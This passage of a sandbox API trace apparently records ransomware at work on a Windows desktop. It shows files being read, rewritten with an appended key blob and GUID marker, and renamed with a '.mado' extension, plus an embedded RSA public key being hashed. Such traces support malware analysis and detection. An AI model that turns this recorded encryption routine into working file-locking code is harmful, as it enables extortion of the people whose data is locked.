lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0x119d3, lpOverlapped=0x0) returned 1 [0203.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.686] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x119d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.687] WriteFile (in: hFile=0x63c, lpBuffer=0x3b66078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b66078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0203.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0203.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0203.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0203.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b6eb68 [0203.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0203.687] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb68*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0203.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.687] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.687] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.687] CloseHandle (hObject=0x63c) returned 1 [0203.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b6eb68 [0203.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.689] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ps1uqay2Ko7 CqfFS9C.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-ps1uqay2ko7 cqffs9c.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ps1uqay2Ko7 CqfFS9C.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-ps1uqay2ko7 cqffs9c.avi.mado")) returned 1 [0203.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.690] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8942b830, ftCreationTime.dwHighDateTime=0x1d5e516, ftLastAccessTime.dwLowDateTime=0xd8229b30, ftLastAccessTime.dwHighDateTime=0x1d5e3b5, ftLastWriteTime.dwLowDateTime=0xd8229b30, ftLastWriteTime.dwHighDateTime=0x1d5e3b5, nFileSizeHigh=0x0, nFileSizeLow=0x1292f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="01AV-Rj70.avi", cAlternateFileName="01AV-R~1.AVI")) returned 1 [0203.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0203.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\01AV-Rj70.avi") returned=".avi" [0203.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\01AV-Rj70.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\01av-rj70.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.691] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=76079) returned 1 [0203.691] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.693] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12909, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.693] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.694] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.694] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1292f, lpOverlapped=0x0) returned 1 [0203.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.695] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.695] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.695] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.695] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.695] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.695] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.696] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.696] SetLastError (dwErrCode=0x0) [0203.696] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.697] SetLastError (dwErrCode=0x0) [0203.697] GetLastError () returned 0x0 [0203.698] SetLastError (dwErrCode=0x0) [0203.698] GetLastError () returned 0x0 [0203.698] SetLastError (dwErrCode=0x0) [0203.698] GetLastError () returned 0x0 [0203.698] SetLastError (dwErrCode=0x0) [0203.698] GetLastError () returned 0x0 [0203.698] SetLastError (dwErrCode=0x0) [0203.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.698] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.698] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.698] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.698] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.698] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12930) returned 0x3b80690 [0203.698] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dc10 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdce0 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dc58 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.699] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b6eb68 [0203.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd70 | out: hHeap=0x2c0000) returned 1 [0203.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdd40 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdd28 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68078 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68190 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd70 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.700] GetCurrentThreadId () returned 0x600 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323670 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.700] GetCurrentThreadId () returned 0x600 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0203.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fddd0 [0203.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.702] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1292f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.702] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0203.702] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.702] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.702] CloseHandle (hObject=0x63c) returned 1 [0203.704] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\01AV-Rj70.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\01av-rj70.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\01AV-Rj70.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\01av-rj70.avi.mado")) returned 1 [0203.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.704] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0203.705] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc760b0, ftCreationTime.dwHighDateTime=0x1d5df1f, ftLastAccessTime.dwLowDateTime=0x8e5090a0, ftLastAccessTime.dwHighDateTime=0x1d5e0d8, ftLastWriteTime.dwLowDateTime=0x8e5090a0, ftLastWriteTime.dwHighDateTime=0x1d5e0d8, nFileSizeHigh=0x0, nFileSizeLow=0x1ac4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0kcmGQ10PrrBAp.m4a", cAlternateFileName="0KCMGQ~1.M4A")) returned 1 [0203.706] 